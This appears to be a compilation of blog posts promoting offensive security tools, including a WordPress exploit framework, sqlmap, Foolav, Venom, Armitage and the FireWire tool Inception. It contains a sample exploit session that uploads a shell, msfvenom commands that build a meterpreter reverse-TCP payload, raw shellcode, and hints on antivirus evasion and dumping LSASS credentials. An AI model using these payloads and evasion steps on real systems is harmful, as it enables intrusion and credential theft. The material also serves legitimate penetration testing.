Check UNIX/Linux Systems For Privilege Escalation - Climber

Automated auditing tool to check UNIX/Linux systems misconfigurations which may allow local privilege escalation.

Dependencies

• python >= 2.7
• python-crypto
• python-mako
• python-paramiko

Note

Climber needs Exscript, a Python module and a template processor for automating network connections over protocols such as Telnet or SSH.
https://github.com/knipknap/exscript
This module is already included in Climber sources.

Download Climber

Read More

A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems - Wordpress-Exploit-Framework

A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.

What do I need to run it?

Ensure that you have Ruby 2.2.x installed on your system and then install all required dependencies by opening a command prompt / terminal in the WPXF folder and running bundle install .

If bundler is not present on your system, you can install it by running gem install bundler .

How do I use it?

Open a command prompt / terminal in the directory that you have downloaded WordPress Exploit Framework to, and start it by running ruby wpxf.rb .

Once loaded, you'll be presented with the wpxf prompt, from here you can search for modules using the search command or load a module using the use command.

Loading a module into your environment will allow you to set options with the set command and view information about the module using info .

Below is an example of how one would load the symposium_shell_upload exploit module, set the module and payload options and run the exploit against the target.

wpxf > use exploit/symposium_shell_upload

[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>

wpxf [exploit/symposium_shell_upload] > set host wp-sandbox

[+] Set host => wp-sandbox

wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/

[+] Set target_uri => /wordpress/

wpxf [exploit/symposium_shell_upload] > set payload exec

[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>

wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!"

[+] Set cmd => echo "Hello, world!"

wpxf [exploit/symposium_shell_upload] > run

[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully

For a full list of supported commands, take a look at This Wiki Page .

What is the difference between auxiliary and exploit modules?

Auxiliary modules do not allow you to run payloads on the target machine, but instead allow you to extract information from the target, escalate privileges or provide denial of service functionality.
Exploit modules require you to specify a payload which subsequently gets executed on the target machine, allowing you to run arbitrary code to extract information from the machine, establish a remote shell or anything else that you want to do within the context of the web server.

What payloads are available?

• bind_php: uploads a script that will bind to a specific port and allow WPXF to establish a remote shell.
• custom: uploads and executes a custom PHP script.
• download_exec: downloads and runs a remote executable file.
• exec: runs a shell command on the remote server and returns the output to the WPXF session.
• reverse_tcp: uploads a script that will establish a reverse TCP shell.

All these payloads, with the exception of custom , will delete themselves after they have been executed, to avoid leaving them lying around on the target machine after use or in the event that they are being used to establish a shell which fails.

How can I write my own modules and payloads?


Guides on writing modules and payloads can be found on The Wiki and full documentation of the API can be found at http://www.getwpxf.com/doc .

Download WEF

Read More

Simple FTP Fuzzer - SFTPfuzzer

SFTPfuzzer (Simple FTP Fuzzer) is a very simple software written in Python 2.7 (by 0x8b30cc), that allows you to easily fuzz username and password field in an FTP Server, looking for a buffer overflow vulnerability.

SFTPfuzzer is written in a very simple way, and the code is well commented, allowing you to easily understand what is going on and easily edit the software. The code is licensed under GNU General Public License (GPL v3), if you want to know more read here.

Usage:

You can use SFTPfuzzer.py in two ways, manual mode and arguments mode.

If you want to manually add target ip address (RHOST) and target port (RPORT), you just need to run:

$ python SFTPfuzzer.py

If you want to add command line arguments, then the usage will be like this:

$ python SFTPfuzzer.py -t <rhost> -p <rport>

For example:

$ python SFTPfuzzer.py -t 192.168.1.8 -p 21

Download SFTPfuzzer

Read More

Automatic SQL Injection And Database Takeover Tool - SQLMap

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features

• Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and HSQLDB database management systems.
• Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
• Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
• Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
• Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
• Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
• Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
• Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
• Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
• Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
• Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.

Refer to the wiki for an exhaustive breakdown of the features.

Download SQLMap

Read More

Pentest Tool For Antivirus Evasion and Running Arbitrary Payload on Target Wintel Host - Foolav

Executable compiled with this code is useful during penetration tests where there is a need to execute some payload (meterpreter maybe?) while being certain that it will not be detected by antivirus software. The only requirement is to be able to upload two files: binary executable and payload file into the same directory.

Usage steps

1. prepare your payload (x86), i.e.
   calc: msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d\xff" -f c 2>/dev/null | egrep "^\"" | tr -d "\"\n;" >foolav.mf (you dont really need to use any encoder or characters blacklisting, it will work anyway)
   meterpreter: msfvenom -p windows/meterpreter_reverse_tcp LHOST=... -a x86 -f c 2>/dev/null | egrep "^\"" | tr -d "\"\n;" >foolav.mf
   
2. copy payload file [executable-name-without-exe-extension].mf in the same directory as executable payload running calc.exe generated using above command: # calc.exe \xbb\x28\x30\x85\x5b\xd9\xf7\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1\x33\x83\xea\xfc\x31\x5a\x0e\x03\x72\x3e\x67\xae\x7e\xd6\xee\x51\x7e\x27\x91\xd8\x9b\x16\x83\xbf\xe8\x0b\x13\xcb\xbc\xa7\xd8\x99\x54\x33\xac\x35\x5b\xf4\x1b\x60\x52\x05\xaa\xac\x38\xc5\xac\x50\x42\x1a\x0f\x68\x8d\x6f\x4e\xad\xf3\x80\x02\x66\x78\x32\xb3\x03\x3c\x8f\xb2\xc3\x4b\xaf\xcc\x66\x8b\x44\x67\x68\xdb\xf5\xfc\x22\xc3\x7e\x5a\x93\xf2\x53\xb8\xef\xbd\xd8\x0b\x9b\x3c\x09\x42\x64\x0f\x75\x09\x5b\xa0\x78\x53\x9b\x06\x63\x26\xd7\x75\x1e\x31\x2c\x04\xc4\xb4\xb1\xae\x8f\x6f\x12\x4f\x43\xe9\xd1\x43\x28\x7d\xbd\x47\xaf\x52\xb5\x73\x24\x55\x1a\xf2\x7e\x72\xbe\x5f\x24\x1b\xe7\x05\x8b\x24\xf7\xe1\x74\x81\x73\x03\x60\xb3\xd9\x49\x77\x31\x64\x34\x77\x49\x67\x16\x10\x78\xec\xf9\x67\x85\x27\xbe\x88\x67\xe2\xca\x20\x3e\x67\x77\x2d\xc1\x5d\xbb\x48\x42\x54\x43\xaf\x5a\x1d\x46\xeb\xdc\xcd\x3a\x64\x89\xf1\xe9\x85\x98\x91\x6c\x16\x40\x78\x0b\x9e\xe3\x84
3. once executable is run, payload file will be parsed, loaded into separate thread and executed in memory: 
4. 

Hints

• x86 binary will run on both x86 and x86_64 Windows systems. Still, you need to use x86 architecture payloads. Nevertheless, x86 meterpreter payload can be migrated to x86_64 processes. After that, load kiwi will load x86_64 version making it possible to access juicy contents of LSASS process memory :)
  
  
  
  
• .mf payload file can be obfuscated - parser will ignore every character other than \xHH hexdecimal sequences. This means, it can append your payload to almost any file, hide it between the lines or even add your own comments, example:
  

Download Foolav

Read More

Metasploit Shellcode Generator / Compiler / Listenner - Venom

The script will use msfvenom (metasploit) to generate shellcode in diferent formats ( c | python | ruby | dll | msi | hta-psh ), injects the shellcode generated into one funtion (example: python) "the python funtion will execute the shellcode in ram" and uses compilers like: gcc (gnu cross compiler) or mingw32 or pyinstaller to build the executable file, also starts a multi-handler to recibe the remote connection (reverse shell or meterpreter session).

'shellcode generator' tool reproduces some of the technics used by Veil-Evasion framework, unicorn.py, powersploit, etc,etc,etc.."P.S. some payloads are undetectable by AV soluctions yes!!!" one of the reazons for that its the use of a funtion to execute the 2º stage of shell/meterpreter directly into targets ram.

option	build	target	format	output
1	shellcode	unix	C	C
2	shellcode	windows	C	DLL
3	shellcode	windows	DLL	DLL
4	shellcode	windows	C	PYTHON/EXE
5	shellcode	windows	C	EXE
6	shellcode	windows	MSIEXEC	MSI
7	shellcode	windows	C	RUBY
8	shellcode	windows	POWERSHELL	BAT
9	shellcode	windows	HTA-PSH	HTA
10	shellcode	windows	PSH-CMD	PS1
11	shellcode	windows	PSH-CMD	BAT
12	shellcode	webserver	PHP	PHP
13	shellcode	multi OS	PYTHON(base64)	PYTHON

Download Venom

Read More

Cyber Attack Management Tool - Armitage

Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets, recommends exploits, and exposes the advanced capabilities of the framework. Armitage aims to make Metasploit usable for security practitioners who understand hacking but don’t use Metasploit every day. If you want to learn Metasploit and grow into the advanced features, Armitage can help you.

Cyber Attack Management Tool

Features

Armitage is a scriptable red team collaboration tool built on top of the Metasploit Framework. Through Armitage, you may launch scans and exploits, get exploit recommendations, and use the advanced features of the Metasploit Framework’s meterpreter. Armitage was originally made for Cyber Defense Exercises, but a lot of penetration testers use Armitage for its collaboration capabilities and its time-saving GUI.

ºCortana Scripting.
ºDynamic Workspaces.
ºGraphical User Interface.
º“Hail Mary” Attack.
ºRed Team Collaboration.


At first glance, it may seem that Armitage is just a pretty front-end on top of Metasploit. That’s not quite true. Armitage is a scriptable red team collaboration tool. It has a server component to allow a team of hackers to share their accesses to compromised hosts.

It’s also possible to write bots that connect to this team server and extend Armitage with scripts written in a language called Cortana. This Cortana piece was funded by DARPA’s Cyber Fast Track program. There’s a lot here.

Installing

Your version of Kali Linux may not include Armitage. To install it, type:

apt-get install armitage

Next, you need to start the Metasploit service. Armitage does not use the Metasploit service, but starting it once will setup a database.yml file for your system. This is a necessary step. You only need to do this once:

service metasploit start
service metasploit stop

Starting

Before you can use Armitage, you must start the postgresql database. This does not happen on boot, so you must run this command each time you restart Kali:

service postgresql start

To start Armitage in Kali Linux, open a terminal and type:

armitage

Armitage will immediately pop up a dialog and ask where you would like to connect to. These parameters only matter if you want to connect to an Armitage team server. Since we’re getting started, we don’t care.  Just press Connect.

Next, Armitage will try to connect to the Metasploit Framework. Big surprise, the Metasploit Framework is not running. Armitage will realize this and it will ask you if you would like it to start Metasploit for you. The correct answer is Yes. Press this button and wait.

You will see connection refused messages for up to a few minutes. If this is your first time starting the Metasploit Framework, this may take literally a few minutes. The Metasploit Framework is the largest Ruby codebase out there and it takes time to load all of its modules for the first time. Be patient.

If all went well, you will see a GUI that looks like this:

You’re now ready to use Armitage.

MANUEL

Download Armitage

Read More

FireWire Physical Memory Manipulation - Inception

Inception is a FireWire physical memory manipulation and hacking tool exploiting IEEE 1394 SBP-2 DMA. The tool can unlock (any password accepted) and escalate privileges to Administrator/root on almost* any powered on machine you have physical access to. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe interfaces.

FireWire Physical Memory Manipulation

Inception aims to provide a stable and easy way of performing intrusive and non-intrusive memory hacks on live computers using FireWire SBP-2 DMA. It is primarily intended to do its magic against computers that utilize full disk encryption such as BitLocker, FileVault, TrueCrypt or Pointsec. There are plenty of other ways to hack a machine that doesn’t pack encryption. Inception is also useful for incident response teams and digital forensics experts when faced with live machines.


As of version 0.2.2, it is able to unlock Windows 8 SP0, Windows 7 SP0-1, Vista SP0 and SP2, Windows XP SP2-3, Mac OS X Snow Leopard, Lion and Mountain Lion, Ubuntu 11.04, 11.10, 12.04, 12.10, Linux Mint 11, 12 and 13 x86 and x64-bit machines. Signatures are added by request.

Requirements

Inception requires:

Hardware:

ºAttacker machine: Linux or Mac OS X (host / attacker machine) with a FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port. Linux is currently recommended due to buggy firewire interfaces on OS X
ºVictim machine: A FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port

Software:

ºPython 3
ºgit
ºgcc (incl. g++)
ºcmake
ºpip (for automatic resolution of dependencies)
ºlibforensic1394
ºmsgpack

Installation

On Debian-based distributions the installation command lines can be summarized as:

sudo apt-get install git cmake g++ python3 python3-pip

On OS X, you can install the tool requirements with homebrew:

brew install git cmake python3

After installing the requirements, download and install libforensic1394:

git clone git://git.freddie.witherden.org/forensic1394.git
cd forensic1394
cmake CMakeLists.txt
sudo make install
cd python
sudo python3 setup.py install

Download and install Inception

git clone git://github.com/carmaa/inception.git
cd inception
./setup.py install

The setup script should be able to install dependencies if you have pip installed.

Download Inception

Read More

RFIDIOt

RFIDIOt is a collection of tools and libraries for exploring RFID technology, written in python. It currently drives a range of RFID readers made by ACG. It provides support for external (currently Compact Flash/USB/Serial) readers, and functions are provided for standard operations such as READ, WRITE, DEBIT, LOGIN etc. Supported standards are ISO 14443A and ISO14443B in the 13.56MHz band, and devices include all MIFARE types, SLE 55Rxx, SLE 66CL160S, SLE 66CLX320P, SR176, SRIX4K, Jewel Tag (IRT0302B11 KSW DIY Eng. Sample), Sharp B, ASK GTML2ISO, TOSMART P064. Support for Smartcards and other RFID operating frequencies and standards are in the pipeline.

It’s called “RFIDIOt” for two reasons:

1. I like puns. This one stands for “RFID IO tools”
2.Since I haven’t done any serious programming for a long time, I felt like an idiot having to learn a whole new language and the code probably looks like it’s written by an idiot. However, python rocks, so it was worth it!


It currently drives a range of RFID readers made by ACG, called the HF Dual ISO and HF Multi ISO, which are both 13.56MHz devices, and the LF MultiTag which is 125/134.2kHz. Frosch Hitag reader/writers are also now supported. There’s no reason it couldn’t work with others, these are just the first ones I got my hands on, and since they present themselves to the O/S as standard serial devices without having to install any drivers, it made interfacing very simple (but see the Technical Note section below as I’ve had some issues recently). I have written some example programs to read/write tags and have started on the library routines to handle the data structures of specific tags like MIFARE®. It is far from complete but I thought I’d follow the “publish early, publish often” philosophy on this one…


PC/SC (MUSCLE) devices, such as the Omnikey CardMan are also supported. I am curently testing with a CardMan 5321.

What standards does it support?

The Dual ISO reader will read (and write) 13.56MHz devices with the following tags: 

  MIFARE® Standard, MIFARE® 4k, MIFARE® Pro, MIFARE® Ultralight, MIFARE® DESFIRE, MIFARE® SmartMX
  SLE 55Rxx, SLE 66CL160S, SLE 66CLX320P, SR176, SRIX4K
  ISO14443A Tags
  ISO14443B Tags
  Jewel Tag (IRT0302B11 KSW DIY Eng. Sample)
  Sharp B
  ASK GTML2ISO
  TOSMART P032/P064

In addition to these, the Multi ISO will also handle ISO 15693, ISO 18000-3, NFC enabled, ICODE standards, specifically:

  I-CODE SLI (SL2 ICS 20)
  I-CODE EPC (SL2 ICS 10)
  I-CODE UID (SL2 ICS 11)
  I-CODE 
  NFC (Reader To Tag Mode)
  SLE 55Rxx
  SRF55VxxP+S
  SLE 66CL160S
  SLE 66CLX320P
  SR176
  SRIX4K
  LRI 64
  LRI 512
  EM4135
  KSW Temp Sens ®
  Tag-it™ HF-I Standard
  Tag-it™ HF-I Pro
  ASK GTML
  ASK GTML2ISO


The LFX will read/write 125kHz devices with the following tags:

  EM4x02
  EM4x50
  EM4x05 (ISO 11784/5 FDX-B)
  Hitag1
  Hitag2
  HitagS
  Q5
  TI-RFID SYSTEMS 64 bit R/O & R/W
  TI-RFID SYSTEMS 1088 bit Multipage

 The Q5 and Hitag2 can be programmed to emulate ‘Unique’ / EM4x02 and FDX-B / EM4x05 standards.

The Frosch will read/write:

  Hitag 1
  Hitag 2
  Hitag S


 The Hitag2 can be programmed to emulate ‘Unique’ / EM4x02 and FDX-B / EM4x05 standards.

Download RFIDIOt

Read More